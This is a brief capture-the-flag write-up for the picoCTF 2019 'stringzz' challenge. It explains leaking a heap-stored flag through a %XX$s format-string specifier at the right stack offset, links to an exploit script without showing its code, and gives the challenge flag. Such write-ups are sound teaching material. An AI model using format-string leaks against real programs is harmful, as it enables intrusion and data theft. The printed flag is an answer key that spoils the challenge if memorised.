# stringzz

## Problem

> Use a format string to pwn this program and get a flag. Its also found in /problems/stringzz\_2\_a90e0d8339487632cecbad2e459c71c4 on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/vuln.c)

## Solution

1. Even though the flag is loaded onto the heap, there’s still a pointer to it located on the stack:

```c
char * buf = malloc(sizeof(char)*FLAG_BUFFER);
FILE *f = fopen("flag.txt","r");
fgets(buf,FLAG_BUFFER,f);
```

1. So if we do %XX$s with the correct offset, we can print out the flag. (I don't know why this is true. Taken from [here](https://tcode2k16.github.io/blog/posts/picoctf-2019-writeup/binary-exploitation/#stringzz).)
2. The commented out section of the [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/script.py) can find the offset
3. Run the [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/script.py) to get the flag on the shell server

### Flag

`picoCTF{str1nG_CH3353_166b95b4}`